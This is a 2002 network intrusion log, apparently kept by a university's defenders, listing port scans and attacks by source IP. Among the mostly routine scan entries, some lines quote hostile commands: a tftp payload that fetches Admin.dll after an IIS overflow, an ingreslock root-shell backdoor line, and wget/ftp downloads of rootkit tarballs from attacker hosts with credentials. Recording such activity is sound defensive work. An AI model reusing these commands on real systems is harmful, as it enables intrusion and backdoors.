2002/03/19-16:41:10.11 62.4.67.179 () scannet for ports 1024, 2072
2002/03/19-17:06:11.44 210.244.158.59 () scannet for port 111
2002/03/19-17:19:45.60 62.4.67.58 () scannet for ports 1024, 2072
2002/03/19-17:54:23.41 132.235.18.116 () portscan 216.136.224.142 for ports 37,5050,23,80,21,25,119,20 several times
2002/03/19-19:48:57.32 61.252.187.20 () scannet for port 60001
2002/03/19-23:55:35.90 206.113.56.193 () scannet for port 21
2002/03/20-00:39:00.03 207.54.186.44 () scannet for port 137
2002/03/20-00:51:30.68 207.54.186.44 () scan several ips for port 80
2002/03/20-11:05:28.92 142.169.51.21 () scannet for port 21
2002/03/20-12:46:15.63 132.235.144.195 () scannet for port 524
2002/03/20-20:00:00.75 61.177.253.121 () 1. start scan of net port 80
2002/03/20-20:00:00.75 61.177.253.121 () 2. Attack selected ips with buff overflow command:
2002/03/20-20:00:00.75 61.177.253.121 () 3.  tftp%20-i%20132.235.80.92%20GET%20Admin.dll%20c:\Admin.dll
2002/03/20-20:27:37.21 144.136.234.162 () scannet for port 21
2002/03/20-22:29:02.41 172.129.110.118 () scannet for port 21
2002/03/21-02:38:46.23 217.128.252.200 () scannet with icmp superscan
2002/03/21-09:37:21.22 62.211.188.11 () scannet for port 21
2002/03/21-16:30:28.49 62.211.42.132 () scannet with icmp superscan
2002/03/21-16:30:29.43 62.211.42.132 () scannet for port 23
2002/03/21-22:06:05.20 193.231.74.12 () scannet for port 53
2002/03/21-22:06:05.50 193.231.74.12 () probe ports 111, 32776, 76t4 on s2 ips, statdx attack
2002/03/22-03:02:00.76 216.205.21.171 () scannet for ports 139,445,137
2002/03/22-03:03:07.55 216.205.21.171 () pound on 132.235.1.89 ports 445,139
2002/03/22-03:12:24.87 216.205.120.226 (226-216.205.120.dellhost.com) scannet for NET NULL session
2002/03/22-03:24:22.24 152.17.220.17 () scannet for NET NULL session
2002/03/22-08:16:22.63 216.205.21.171 () try to login 100s ips via ftp to pcs with user id found from scan of port 139
2002/03/22-16:05:08.76 80.14.25.31 () scannet for port 21
2002/03/22-19:21:03.00 129.1.200.138 () scannet for port 1214
2002/03/22-20:04:50.92 210.55.204.211 () scannet for port 111-portmap list
2002/03/23-03:20:54.72 193.251.67.186 () scannet for port 21
2002/03/23-06:03:00.75 61.132.4.114 () scannet for port 21
2002/03/23-21:02:19.80 132.235.238.1 (admin.memaud.ohiou.edu) scannet for NET NULL session
2002/03/24-00:28:48.57 202.66.92.132 () scannet for port 515
2002/03/24-08:32:22.48 202.99.176.28 () scannet for port 111 - portmap list
2002/03/24-10:31:51.33 202.99.176.28 () probe various ips for port 600 - portmap list
2002/03/24-10:31:51.33 202.99.176.28 () start of buff overflow attacks
2002/03/24-10:32:03.16 202.99.176.28 () start of buff overflow attacks port 32783,32790,32781
2002/03/24-11:20:46.89 80.11.244.221 () scannet for por 21
2002/03/24-12:30:09.17 213.201.169.150 () scannet for port 21
2002/03/24-14:30:35.83 204.244.65.77 () scannet for port 21
2002/03/24-17:21:48.00 132.156.28.75 () scannet for port 22
2002/03/24-18:08:34.70 212.67.238.20 () scannet for port 21
2002/03/24-21:23:55.51 129.32.96.173  () scannet for port 12345
2002/03/24-21:33:34.44 142.176.146.186 (mailhost.seatech.ns.ca) 1. scannet for port 1524, 6112
2002/03/24-21:33:34.44 142.176.146.186 (mailhost.seatech.ns.ca) 2. buff overflow attack on port 6112 
2002/03/24-21:33:34.44 142.176.146.186 (mailhost.seatech.ns.ca) 3. echo "ingreslock stream tcp nowait root /bin/sh sh -i">/tmp/x ... 
2002/03/25-00:40:54.26 80.14.77.91 () scannet for port 21
2002/03/25-12:55:56.62 217.128.68.108 () scannet for port 21
2002/03/26-08:17:28.00 218.186.91.183 (cm183.omega91.scvmaxonline.com.sg) scannet for port 21
2002/03/26-11:51:09.84 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524
2002/03/26-13:41:09.43 212.108.224.214 (radnoti.vac.hu) scannet for port 21
2002/03/26-14:09:56.00 62.211.188.23 () scannet for port 21
2002/03/26-15:29:35.90 61.132.209.239 () scannet for ports 8000,8080,3128
2002/03/26-19:56:00.46 61.142.238.56 () scannet for port 111 - portmap list
2002/03/26-22:13:27.27 65.204.164.1 () scannet for port 21
2002/03/26-22:14:23.28 65.204.164.1 () buff overflow attack 132.235.1.7 port 6112
2002/03/27-01:08:15.28 65.94.189.169 (MTL-HSE-ppp191993.qc.sympatico.ca) scannet for port 80
2002/03/27-08:30:52.20 148.204.196.172 (Instituto Politecnico Nacional ) scannet for port 21
2002/03/27-08:35:05.03 148.204.196.172 (The attack came from Instituto Politecnico Nacional) successful attack via ftp buff overflow attack.
2002/03/27-08:46:15.01 66.104.123.116 (Hanyang University, Korea.) 1. follow up attack from 148.204.196.172, create users news,bobo
2002/03/27-08:46:15.01 66.104.123.116 (Hanyang University, Korea.) 2. attempt ftp to  m-net.arbornet.org failed
2002/03/27-08:46:15.01 66.104.123.116 (Hanyang University, Korea.) 3. ftp 193.231.236.42 (bobolinoiuby/jmecerash) get epcs2,eu.tgz
2002/03/27-08:46:15.01 66.104.123.116 (Hanyang University, Korea.) 4. tried: wget www.geocities.com/bobo666ro/eu.tgz
2002/03/27-08:46:15.01 66.104.123.116 (Hanyang University, Korea.) 5. (ptrace setregs bug?) failed when executed.
2002/03/27-09:04:01.85 66.134.249.126 (h-66-134-249-126.NYCMNY83.covad.net) 1. IIS buff overflow attacks with command:
2002/03/27-09:04:01.85 66.134.249.126 (h-66-134-249-126.NYCMNY83.covad.net) 2. tftp%20-i%20132.65.78.238%20GET%20Admin.dll%20c:\Admin.dll
2002/03/27-09:14:09.07 61.132.210.126 (CHINANET Anhui province network,CN) scan net for port 8000,8080,3128
2002/03/27-09:51:16.49 132.235.8.76 (securityscan.cns.ohiou.edu) scannet with ping
2002/03/27-09:54:00.01 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524
2002/03/27-10:03:42.89 61.132.208.186 (CHINANET Anhui province network,CN) scan several ips for port 8000
2002/03/27-16:09:23.94 62.204.197.138 (ccia-062-204-197-138.uned.es) scannet for port 60001
2002/03/27-17:11:49.12 66.130.72.141 (modemcable141.72-130-66.sherb.mc.videotron.ca) scannet for port 21
2002/03/28-01:19:32.16 202.96.216.160 (CHINANET Shanghai province network,CN) scannet for port 22
2002/03/28-03:00:53.13 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524
2002/03/28-06:59:21.32 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) slow scan of net for port 524
2002/03/28-08:29:57.68 217.35.45.135 (host217-35-45-135.in-addr.btopenworld.com) scannet for port 80
2002/03/28-11:07:02.65 12.129.76.204 (ASV Cyber Solutions,GA,US) scannet for port 445
2002/03/28-12:19:50.79 213.229.84.173 (hoogeveen5-173.kabel.dekooi.nl) scannet for port 1025
2002/03/28-12:43:24.90 80.13.235.31 (AReims-104-1-2-31.abo.wanadoo.fr) scannet for port 21, anon ftp attack
2002/03/28-14:39:51.26 194.117.24.44 (panda.inescn.pt) scannet for port 21
2002/03/28-19:08:42.22 65.34.34.40 (c-65-34-34-40.se.client2.attbi.com) scannet for port 1025
2002/03/28-19:08:44.00 216.86.101.192 (101-192.sdial.gen.pacificcoast.net) scannet for port 1025
2002/03/28-19:09:46.35 206.148.146.186 (AGIS,Reston,VA) scannet for port 1025
2002/03/28-21:22:57.91 217.229.136.46 (pD9E5882E.dip.t-dialin.net) scannet for port 21
2002/03/28-22:24:25.93 66.77.93.3 (GalaxyNet Corporation ,CA,US) scannet for port 21
2002/03/28-22:31:05.85 66.77.93.3 (GalaxyNet Corporation ,CA,US) 1. ftpd buff overflow attack., successful
2002/03/28-22:31:05.85 66.77.93.3 (GalaxyNet Corporation ,CA,US) 2. /usr/bin/wget http://diablows.org/gold.tgz
2002/03/28-22:31:05.85 66.77.93.3 (GalaxyNet Corporation ,CA,US) 3. rpm -ivh --force ftp://ftp.intraware.com/pub/wget/wget-1_5_3-1_i386.rpm
2002/03/28-22:31:05.85 66.77.93.3 (GalaxyNet Corporation ,CA,US) 4. ftp www.bartweb.org (bartbb/hulig4n) cd public_html/adx/jacky;get rk.tgz
2002/03/29-09:07:56.65 202.185.243.121 (Ins Peny Minyak K.Sawit M'sia (PORIM),MY)scannet with ping
2002/03/29-09:08:02.30 202.185.243.121 (Ins Peny Minyak K.Sawit M'sia (PORIM),MY) probe ports 79,161,201 on all ips on net
2002/03/29-13:49:15.17 152.163.159.225 (rtc-ext1.ns.aol.com) attempt to use various ips as DNS. 
2002/03/29-16:10:12.66 24.154.91.98 (acs-24-154-91-98.zoominternet.net) scannet for port 137 for netbios-name-query
2002/03/30-03:20:12.14 211.23.57.130 (CHTD, Chunghwa Telecom Co.,Ltd.,TW) scannet for port 21
2002/03/30-06:30:43.76 211.233.75.10 (KIDC,SEOUL,KR) scannet for port 21
2002/03/30-07:34:05.59 202.143.228.35 (INTERNET SERVICE PROVIDER,IN) attack IIS w/buff overflow=tftp%20-i%20132.0.0.7%20GET%20Admin.dll%20c
2002/03/30-08:17:41.03 61.177.247.36 (CHINANET Jiangsu province network,CN)  attack IIS w/buff overflow=tftp%20-i%20132.235.80.92%20GET%20Admin.dll%20c:\Admin.dll
2002/03/30-10:00:12.69 203.197.214.121 (Leased line - CMC Limited, New Delhi,IN) portmap scan
2002/03/30-10:57:21.12 133.95.167.16 (Japan Network Information Center.JP) scannet for port 21
2002/03/30-11:10:33.86 61.120.74.228 (Kokusai-Kougyou-Kanda,JP) scannet for port 111,21
2002/03/30-11:28:35.55 217.86.10.222 (pD9560ADE.dip.t-dialin.net) scannet for port 21
2002/03/30-12:05:32.08 150.244.10.23 (grid001.ft.uam.es) scannet for port 21
2002/03/30-12:26:08.00 202.188.8.180 (as-8-180.tm.net.my) scannet with ping
2002/03/30-12:26:08.00 202.188.8.180 (as-8-180.tm.net.my) scannet with ping, for ports 79,161,21,23
2002/03/30-18:31:44.42 61.96.16.20 (LinuxPPC,KR) scannet for port 21
2002/03/30-19:10:38.69 63.208.234.195 (unknown.Level3.net) scan several ips for port 1214
2002/03/30-20:42:58.44 63.218.185.3 (CAIS Internet,McLean, VA,US) scannet for port 21
2002/03/31-02:35:16.09 12.8.184.58 (airlink-12-8-184-58.isla.net) attack prviously broken in machine to hack attempts to fix it.
2002/03/31-04:32:43.01 210.187.192.81 (TMnet Telekom Malaysia,MY) scannet with ping
2002/03/31-04:32:49.39 210.187.192.81 (TMnet Telekom Malaysia.MY) scanet for port s79, 161,1524
2002/03/31-05:02:32.28 210.187.192.81 (TMnet Telekom Malaysia.MY) try to login as root/root
2002/03/31-08:58:48.17 64.23.0.112 (ns.yakinaman.net) scannet for port 21
2002/03/31-10:33:03.45 203.149.135.194 (c194.h203149135.is.net.tw) scannet for port 22
2002/03/31-18:46:16.32 202.120.192.49 (Shanghai Education Commission,CN) scannet for port 21
2002/03/31-19:46:02.34 216.174.236.3 (CENTURY FUNDING GROUP, WA,US) scannet for port 21